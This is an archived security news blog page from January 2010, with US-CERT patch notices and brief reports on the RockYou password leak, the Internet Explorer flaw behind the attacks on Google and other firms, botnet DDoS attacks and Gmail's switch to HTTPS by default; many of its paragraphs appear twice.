Cisco has released a security advisory to address multiple vulnerabilities in Unified MeetingPlace. These vulnerabilities may allow a remote, unauthenticated attacker to obtain sensitive information, manipulate configuration data, create unauthorized accounts, operate with elevated privileges or cause a denial-of-service condition.
US-CERT encourages users and administrators to review Cisco security advisory cisco-sa-20100127-mp and apply any necessary updates to help mitigate the risks.
Monthly Archives: January 2010
Google Releases Chrome 4.0.249.78
Google has released Chrome 4.0.249.78 for Windows to address multiple vulnerabilities. These vulnerabilities may allow an attacker to execute arbitrary code, obtain sensitive information, bypass security restrictions, or cause a denial-of-service condition.
US-CERT encourages users and administrators to review the Google Chrome Releases blog entry and update to Chrome 4.0.249.78 for Windows to help mitigate the risks.
US-CERT encourages users and administrators to review the Google Chrome Releases blog entry and update to Chrome 4.0.249.78 for Windows to help mitigate the risks.
Password security a tall order for many web users
Filed under Security News
Tagged as 123456, breach, data, password, RockYou, security, users, weak, web
Tagged as 123456, breach, data, password, RockYou, security, users, weak, web
A recently released study from tech researcher Imperva showed that the most popular password among users whose accounts were compromised in the recent RockYou data breach was as follows: 123456.
Experts say that weak passwords are one of the Achilles' Heels of modern network security, since most people tend to use the same easy-to-guess password on multiple sites. Over half of the accounts that Imperva analyzed from the RockYou case chose only alphanumeric characters, which made them much easier to break into.
As it happens, 123456 was also the most popular password among Hotmail users whose accounts were similarly compromised in a large-scale phishing attack that took place in October 2009. "Password" was also one of the most common passwords discovered by Imperva in the RockYou incident.
IT security professionals can take several steps to help beef up password security at their company, including the creation of rules governing password length and content (i.e., no five-character passwords, must contain at least one number and at least one special character) and making sure that no password can be discovered by a simple dictionary hack.
Experts say that weak passwords are one of the Achilles' Heels of modern network security, since most people tend to use the same easy-to-guess password on multiple sites. Over half of the accounts that Imperva analyzed from the RockYou case chose only alphanumeric characters, which made them much easier to break into.
As it happens, 123456 was also the most popular password among Hotmail users whose accounts were similarly compromised in a large-scale phishing attack that took place in October 2009. "Password" was also one of the most common passwords discovered by Imperva in the RockYou incident.
IT security professionals can take several steps to help beef up password security at their company, including the creation of rules governing password length and content (i.e., no five-character passwords, must contain at least one number and at least one special character) and making sure that no password can be discovered by a simple dictionary hack.
Apple releases patches for OS X security flaws
Filed under Security News
Tagged as 10.5, 10.6, Flash, holes, images, OpenSSL, OS X, patch, security, update
Tagged as 10.5, 10.6, Flash, holes, images, OpenSSL, OS X, patch, security, update
Vulnerabilities in OS X 10.5 and 10.6 were addressed in Apple's first security update of 2010, patching a dozen known security holes in the Mac operating system.
While five of the vulnerabilities were inherent in Apple's own software, the other seven were found in Adobe's Flash Player plug-in, which could lead to remote code execution and other serious issues. Experts say that Flash Player is fast developing a reputation as one of the most popular targets for would-be cyber criminals.
Media functionality was at the heart of the remaining problems as well, as Apple fixed vulnerabilities to maliciously crafted .mp4 audio files, .dng images, and .tiff images. The company's latest round of patches also fixed a months-old vulnerability in OpenSSL, which could have allowed attackers to breach network security and alter protected internet sessions.
PC Magazine security blogger Larry Seltzer questions the timing of the OpenSSL patch, since OpenSSL itself released a fix for the problem "almost immediately" after the discovery of the vulnerability. "It's not clear what took Apple so long," writes Seltzer.
While five of the vulnerabilities were inherent in Apple's own software, the other seven were found in Adobe's Flash Player plug-in, which could lead to remote code execution and other serious issues. Experts say that Flash Player is fast developing a reputation as one of the most popular targets for would-be cyber criminals.
Media functionality was at the heart of the remaining problems as well, as Apple fixed vulnerabilities to maliciously crafted .mp4 audio files, .dng images, and .tiff images. The company's latest round of patches also fixed a months-old vulnerability in OpenSSL, which could have allowed attackers to breach network security and alter protected internet sessions.
PC Magazine security blogger Larry Seltzer questions the timing of the OpenSSL patch, since OpenSSL itself released a fix for the problem "almost immediately" after the discovery of the vulnerability. "It's not clear what took Apple so long," writes Seltzer.
Cloud network security concerns prompt Microsoft to propose new laws
Filed under Security News
Tagged as cloud, Cloud Computing Advncement Act, Computer Fraud and Abuse Act, Congress, law, Microsoft, network, security
Tagged as cloud, Cloud Computing Advncement Act, Computer Fraud and Abuse Act, Congress, law, Microsoft, network, security
Microsoft's general counsel, Brad Smith, told an audience at the Brookings Institution today that the government should step in to regulate the emerging cloud computing industry and help protect businesses and consumers from fraud and abuse.
Smith said that the results of a survey it conducted recently found that 58 percent of the general public and 86 percent of industry leaders were "excited" at the prospect of cloud computing solutions, but that 90 percent of all respondents had serious concerns about security or privacy.
Smith proposed that Congress pass a Cloud Computing Advancement Act, which, he said, would give the government the necessary powers to address those concerns, as well as protect international sovereignty. He also called on senators and representatives to beef up the Computer Fraud and Abuse Act, to provide assistance to law enforcement efforts in the cloud.
Many experts agree that the cloud poses significant security challenges, due in part to its more open nature and in part to the growing organization and sophistication of the latest generation of cyber criminals.
Smith said that the results of a survey it conducted recently found that 58 percent of the general public and 86 percent of industry leaders were "excited" at the prospect of cloud computing solutions, but that 90 percent of all respondents had serious concerns about security or privacy.
Smith proposed that Congress pass a Cloud Computing Advancement Act, which, he said, would give the government the necessary powers to address those concerns, as well as protect international sovereignty. He also called on senators and representatives to beef up the Computer Fraud and Abuse Act, to provide assistance to law enforcement efforts in the cloud.
Many experts agree that the cloud poses significant security challenges, due in part to its more open nature and in part to the growing organization and sophistication of the latest generation of cyber criminals.
France and Germany warn citizens to avoid using Internet Explorer
The governments of both France and Germany have issued official warnings to their citizenry, saying that, until Microsoft releases a patch for the widely-used Internet Explorer web browser, it is a threat to network security and should not be used.
Tech news website eWeek reports that the exploit that has caused such widespread concern in Europe is the same one that was used to attack a number of corporate systems in the U.S., including Google, which has since caused that company to announce that it would cease cooperation with the Chinese government. Concerns have been raised about the Chinese government's possible involvement in the attacks.
The French and German governments both advised their citizens to switch to alternative web browsers, while eWeek reports that Microsoft has said the vulnerability can be avoided with a switch to Internet Explorer 8, thought to be immune to the exploit.
The French information agency CERTA said in a statement that it strongly advised users to disable dynamic code and to browse the internet with limited user rights active on the machine.
Tech news website eWeek reports that the exploit that has caused such widespread concern in Europe is the same one that was used to attack a number of corporate systems in the U.S., including Google, which has since caused that company to announce that it would cease cooperation with the Chinese government. Concerns have been raised about the Chinese government's possible involvement in the attacks.
The French and German governments both advised their citizens to switch to alternative web browsers, while eWeek reports that Microsoft has said the vulnerability can be avoided with a switch to Internet Explorer 8, thought to be immune to the exploit.
The French information agency CERTA said in a statement that it strongly advised users to disable dynamic code and to browse the internet with limited user rights active on the machine.
Network security could be tested by bigger, badder DDoS attacks
Botnets of ever-expanding size could be used to perform large-scale distributed denial of service attacks against selected computers, experts say, disrupting some of the internet's most basic functionality.
Andy Ellis, the CSO of Akamai Technologies, told CIO magazine that it's possible that even the creators of the botnets are not fully aware of how widely their creations have spread, though PC World reports that a quarter of botnet-infected PCs are in enterprise networks.
Ellis also said that the DDoS attacks of today are far more sophisticated than the worm-created ones of the past. Instead of techniques like Mydoom or Blaster, which dramatically slow the machines that they infect, CIO reports, the botnets target servers with a flood of seemingly licit connection requests. The resultant slowdown affects only the targeted machine, which can easily use up all of its allotted bandwidth and cease to be accessible.
Experts say that botnets typically spread via phishing and some types of worm programs, which can automatically spread themselves across a network without any action by a human user beyond the initial infection.
Andy Ellis, the CSO of Akamai Technologies, told CIO magazine that it's possible that even the creators of the botnets are not fully aware of how widely their creations have spread, though PC World reports that a quarter of botnet-infected PCs are in enterprise networks.
Ellis also said that the DDoS attacks of today are far more sophisticated than the worm-created ones of the past. Instead of techniques like Mydoom or Blaster, which dramatically slow the machines that they infect, CIO reports, the botnets target servers with a flood of seemingly licit connection requests. The resultant slowdown affects only the targeted machine, which can easily use up all of its allotted bandwidth and cease to be accessible.
Experts say that botnets typically spread via phishing and some types of worm programs, which can automatically spread themselves across a network without any action by a human user beyond the initial infection.
Security flaw in IE used to target U.S. firms in cyber attack
Filed under Security News
Tagged as attack, Cyber, IE, off-cycle, patch, repair, update, vulnerability
Tagged as attack, Cyber, IE, off-cycle, patch, repair, update, vulnerability
Microsoft announced yesterday that the cyber criminals who launched a large-scale assault on network security at multiple American firms did so via a vulnerability in the company's Internet Explorer browser software.
A security alert released by the company said that IE 6 installations running on some less commonly used versions of Windows were vulnerable, as well as IE 6, 7, and 8 installations on Windows XP, Vista, Server 2003/2008, and Windows 7. Microsoft has said that it is working on a solution and could release an off-cycle update to repair the vulnerability.
CNET reports that source code was stolen from over 30 U.S. firms targeted in the attack, including Adobe, Yahoo, Symantec, and Dow Chemical, though only Adobe has issued an official confirmation that it was attacked.
Experts say that setting IE's security features to maximum prevents the attack from gaining access to valuable personal or company data. According to PC Magazine, this implies the exploit targets IE's unprivileged context, outside of which it is unlikely to cause many problems.
A security alert released by the company said that IE 6 installations running on some less commonly used versions of Windows were vulnerable, as well as IE 6, 7, and 8 installations on Windows XP, Vista, Server 2003/2008, and Windows 7. Microsoft has said that it is working on a solution and could release an off-cycle update to repair the vulnerability.
CNET reports that source code was stolen from over 30 U.S. firms targeted in the attack, including Adobe, Yahoo, Symantec, and Dow Chemical, though only Adobe has issued an official confirmation that it was attacked.
Experts say that setting IE's security features to maximum prevents the attack from gaining access to valuable personal or company data. According to PC Magazine, this implies the exploit targets IE's unprivileged context, outside of which it is unlikely to cause many problems.
Gmail improves network security for clients
Filed under Security News
Tagged as encryption, Gmail, Google, HTTP, HTTPS, security, sniff, speed, SSL, tamper
Tagged as encryption, Gmail, Google, HTTP, HTTPS, security, sniff, speed, SSL, tamper
Secure HTTP access to Google's free Gmail service is now active by default, the company announced earlier this week, making Gmail messages less susceptible to unauthorized access.
Google says that the new functionality will help protect users who have not already switched to HTTPS. The company wrote on the official Gmail blog that they had carefully weighed the tradeoffs between security and speed, since HTTPS data transfers tend to move slightly slower than those sent without encryption.
The option to use HTTPS for Gmail connections has been present since 2008, but it was turned off by default. Users will still be able to use Gmail over standard HTTP, but Google says that only those users confident in their network security settings should disable HTTPS.
PC World speculates that the move may have been prompted by the recent hacking attempts by Chinese cyber criminals to gain access to the email accounts of human rights campaigners. The attack has also provoked a decision by Google to stop filtering search results for its Google.cn portal, which is likely a signal of the end of the company's presence in China.
Google says that the new functionality will help protect users who have not already switched to HTTPS. The company wrote on the official Gmail blog that they had carefully weighed the tradeoffs between security and speed, since HTTPS data transfers tend to move slightly slower than those sent without encryption.
The option to use HTTPS for Gmail connections has been present since 2008, but it was turned off by default. Users will still be able to use Gmail over standard HTTP, but Google says that only those users confident in their network security settings should disable HTTPS.
PC World speculates that the move may have been prompted by the recent hacking attempts by Chinese cyber criminals to gain access to the email accounts of human rights campaigners. The attack has also provoked a decision by Google to stop filtering search results for its Google.cn portal, which is likely a signal of the end of the company's presence in China.